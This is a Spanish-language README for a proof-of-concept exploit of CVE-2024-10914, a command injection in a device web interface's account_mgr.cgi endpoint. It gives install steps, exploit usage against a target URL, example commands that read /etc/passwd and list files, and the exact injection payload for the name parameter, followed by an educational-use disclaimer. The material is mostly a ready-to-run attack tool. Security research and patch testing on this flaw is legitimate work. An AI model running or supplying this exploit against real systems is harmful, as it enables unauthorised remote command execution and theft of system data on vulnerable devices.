
PoC para explotar el CVE-2024-10914
Exploit para vulnerabilidad de inyección de comando en el endpoint /cgi-bin/account_mgr.cgi. Esta vulnerabilidad permite ejecutar comandos arbitrarios en el sistema afectado a través de parámetros no sanitizados.
CVE-2024-10914 es una vulnerabilidad de inyección de comandos que afecta a dispositivos con interfaz web CGI. La aplicación vulnerable no valida correctamente el parámetro name en la solicitud cgi_user_add, permitiendo que un atacante inyecte comandos del sistema que se ejecutarán con privilegios de la aplicación.
Clone el repositorio y instale las dependencias:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
O instale manualmente:
pip install requests
El script proporciona dos argumentos:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (requerido): URL del objetivo (ejemplo: http://192.168.1.1)-c, --command (opcional): Comando a ejecutar (default: id)Ejecutar comando id:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
Ejecutar comando personalizado:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
Listar archivos:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
El exploit envía una solicitud GET al endpoint vulnerable con el siguiente payload:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
La cadena vacía se cierra con comillas y se inyecta el comando deseado, que se ejecuta en el contexto del servidor.
El script mostrará:
Este código es proporcionado únicamente con fines educativos y de investigación de seguridad. Solo debe utilizarse en sistemas de los que tenga autorización explícita. El uso no autorizado de este exploit puede violar leyes locales y constituir un delito. El autor no se responsabiliza por el mal uso de esta herramienta.
SS3K
No especificada